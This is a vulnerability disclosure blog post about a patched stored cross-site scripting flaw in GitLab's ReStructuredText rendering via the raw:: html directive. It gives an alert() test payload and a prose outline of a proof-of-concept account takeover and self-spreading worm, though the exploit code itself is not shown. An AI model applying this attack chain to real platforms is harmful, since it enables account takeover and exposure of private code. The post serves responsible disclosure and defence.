Published on 05/15/2024 14:25 by Ritz
…or how I stubbed my toe on the keys to a few dozen kingdoms
NOTE: this content originally appeared on the Taos blog
I’m authoring this security writeup in ReStructuredText. An odd way to start this off, I know. But bear with me, I promise that ReStructuredText is relevant to a recently patched major vulnerability I uncovered in GitLab. Hopefully that’s a strange enough sentence to capture your attention. If not I promise cookies 35% of the way through this document.
ReST up
ReStructuredText is my favorite lightweight plaintext markup language, and I tend to prefer it over the much more popular Markdown on the basis of its greater standardization and the greater power of its base feature set. In addition it’s also the primary documentation parsing system for the Python community, making it an easy choice to learn for Python coders such as myself.
Because of this I have often used the Pelican static site generator to build websites. It is a tool which takes ReStructuredText as input and outputs static HTML websites. These websites are fast, secure, and simple to administer. I turned to Pelican again when creating a site for my wife’s new webcomic, herpaderp.party. It was during the process of creating this site that I stumbled across something that I can only reasonably describe as “kind of a big deal.”
The glitch
In the process of creating the
feeds page for
herpaderp.party, I found it necessary to have recourse to the
ReStructuredText raw
directive in order to force raw HTML into a page.
The pre-parsed code looks like this:
.. raw:: html
<form method='post' action='https://blogtrottr.com'>
Your email: <input type='text' name='btr_email' />
<input type='hidden' name='btr_url' value='https://herpaderp.party/feeds/strips.atom.xml' />
<input type='hidden' name='schedule_type' value='6' />
<input type='submit' value='Follow this feed via email' />
</form>
<br />
This produces the output that you see on the above page, and is a relatively clean solution to the problem that I was presented with. What shocked me, however, was the fact that after I had committed the code and pushed it to GitLab the raw HTML code I had inserted was visible, not as code, but as the button that the code itself defines.
All of the major web-based SCM platforms (GitHub, Bitbucket, GitLab and Phabricator) support previewing the rendered text of a number of popular markup formats (such as ReStructuredText, Markdown, AsciiDoc, etc). At this point it’s very near to being a required feature in the space. It’s this feature that enables the richly formatted README files that people have come to expect from the web frontends of their SCM solutions. However with the ability to insert raw HTML into the output comes the potential capability to rewrite the website itself as it’s presented to the user. This was when my concern started to bubble to the surface.
The problem
While Pelican rendering my raw
directive is totally acceptable (it’s
my site with my content parsed by me), for GitLab to render this HTML is
another matter entirely. As a general rule a website should never allow
user-supplied HTML to run on the site, especially without sanitization.
The reasons for this were well exposed by the
Samy worm, but
this writeup may serve as a refresher on the dangers.
One of the first steps to determining the seriousness of the issue was
to attempt to issue basic JavaScript
calls from within the presented content. The most straightforward method
of performing this is by attempting to pop up a message box using the
alert()
call, like so:
<script type='text/javascript'>
alert('This is an alert to test if this site may be pwnable');
</script>
On discovering that I could, indeed, inject JavaScript into a GitLab website that would be triggered whenever I viewed the offending file (a project’s README.rst file in this case), the next question to ask is “can users viewing this page have their accounts taken over?” The answer to that question is a resounding “kinda, but functionally yes.”
Cookies are delicious, except when you can’t eat them…
In general GitLab has done a good job of ensuring that their application is secure. This is good because I regularly recommend it to clients and friends (and will continue to do so) and use it almost exclusively to host my code. I’m a fan. As a result of them having done a good job, they’ve made it so that you cannot just “grab” the user’s session cookie and send it away to a remote location.
If we had been able to perform that operation, it would have been trivial to fully impersonate every single user that viewed the README file of the project. This is as dangerous as a standard phishing attack, however from a user perspective it has none of the giveaways. It comes from a trusted URL and displays no popups asking for permission or access. So we’re very lucky that such an attack is not permitted. Unfortunately however, when you are executing on the browser with code originating from the website that you want to perform actions on, this protection becomes immaterial.
AJAX the great
AJAX is a web subsystem that powers the vast majority of modern websites. Fundamentally, AJAX is what allows pages to fill and populate content without requiring the user to refresh the page. Your Facebook and Twitter feeds, Google Maps, practically every popular website makes use of AJAX extensively.
At its core, AJAX allows a website to request additional content by means of JavaScript calls. Because I can inject JavaScript into the README page of a project, I now have the power to make the same AJAX requests as the application itself, with all of the privileges of the user viewing the README. Using these calls I created the proof of concept that I submitted to GitLab’s security team.
Anatomy of a POC
Now, I’m sure “real” researchers are cringing in pain at my awful, cobbled-together JavaScript. And make no mistake, I don’t consider myself to be a pro. In fact this is my first JavaScript ever. The reason I’m showcasing it is to prove how simple it can be to craft an incredibly dangerous attack given even mediocre skill, under the right conditions.
The POC exploit first makes an HTTP GET request for the user’s dashboard page and indexes the entire list of projects to which they have access. It then accesses the user access management page for each of those projects (more GET requests) and retrieves a security token from the user managment forms on those pages. This token is required for the final step, and is designed to help mitigate against CSRF. Unfortunately in this case our attack is not cross-site at all, and therefore we can simply ask for this token (just as the user’s normal application usage would).
The final, and most critical step of a POC is the actual exploit, the “what” that occurs after the “how”. In this case the final step is to make a HTTP POST request against the API endpoint for user management to add a new user to the project with full permissions:
The simple attack…extended
The ability to execute drive-by requests on behalf of a user is dangerous on a fundamental level, but on a platform like GitLab the problem expands because it becomes possible to make the exploit self-replicating. In short, it can be extended into a worm.
If the user who is given master access to every project then adds the exploit code to the README of those projects, as more users view them the exploit code can be added to more projects. Dependent on the viewing rate it would rapidly become resident in the majority of the projects on the platform. This entire process could be automated, of course. Additionally, it’s important to remember that access to private projects would be possible in this way, so all repositories that users might have considered “secure” would suddenly be exposed. Secret keys, credentials, and proprietary code would be available to the attacker.
It’s therefore clear that even this small parsing vulnerability can, in the right circumstances, become a very serious security issue. But how did it happen in the first place? How did GitLab come to be vulnerable to this attack?
The bug is always upstream
It turns out that GitLab’s parsing of ReStructuredText documents is performed by a Ruby gem called gitlab-markup. This gem was forked from an open-source gem created by GitHub, github-markup. GitLab uses this code to run the actual Python program (docutils) which performs the rendering.
Github-markup performs this rendering via a wrapper script called
rest2html.
Rest2html explicitly allows raw
directives, under code added in commit
68557d2
which flipped this switch from false
to true
(the commit message
rather ironically reads “enable raw html”). I’ve already opened issue
981 with that project,
but have not yet received a response as to why this was not considered a
risk. From my rudimentary testing GitHub appears to block raw:: html
entirely, so it’s possible this may no longer be the code that they run
on their systems. Or perhaps they perform some additional sanitization
later on.
What about everyone else?
Although GitHub may be protecting itself in a satisfactory manner, still of concern are the vast number of downstream projects that use this code. A full 708 repositories on GitHub alone are listed as dependent, but there may be many others not hosted on GitHub or who use this upstream module in a way not caught by GitHub’s dependency graph.
For all of these applications it is vital that their authors consider carefully whether they are using this code in a safe manner. Is it rendering user supplied content back to other users, and if so is that output being sanitized before use? My recommendation would be to heed the warnings of the authors of docutils and disable raw entirely from running in any context on user-supplied data. It is, by admission of its own documentation, a security risk. Heck, if you’re foolish enough to enable raw file or URL access you can actually access files and URLs from the system on which the parser is running. Terrifying.
GitLab’s response
GitLab is to be lauded for their incredibly professional and speedy
response. They were back to me in less than 24 hours after initial
disclosure and had a provisional patch to me less than 24 hours after
that. The vulnerability was publically
announced
on 2017/01/10 with a
patch that
disables the raw:: html
directive entirely.
It is a sad but inescapable truism that code will have bugs, and what’s important is that we find, fix, and learn to keep ourselves safer over time. speaking of that…
Lessons to learn
In inheriting code from an upstream source it is critical to understand that you also inherit that code’s perception of its own security model within its environment. github-markup may be secure within the GitHub and GitHub Enterprise software stack, but is not guaranteed to be secure outside of it. The usage of a library by a well known and generally “considered secure” vendor does not mean that you can incorporate it into your product without careful evalutation.
As we develop software we must not only inspect and test the code (both that which we write and that which we inherit), but also the application after all of the code has been assembled and installed. While it’s obviously infeasible to validate every line of code in an operating system just to write an app that runs atop it, there is no substitute for aggressive testing of your application once it has been stood up. Qualified professionals (did you notice that we’re on the Taos blog?) can help you discover the chinks in your armor before somebody nefarious starts holding your users for ransom and damaging your reputation.
Thanks to
- Taos: for giving me a good place to talk about this
- GitLab: for being so much more professional than most upon being informed of a flaw
- DC562 (My Long Beach Defcon Group): for helping me learn how to hack properly
- My ex-wife: for putting up with my perpetual lack of sleep while I fix broken pieces of computer
Written by Ritz
← Back to post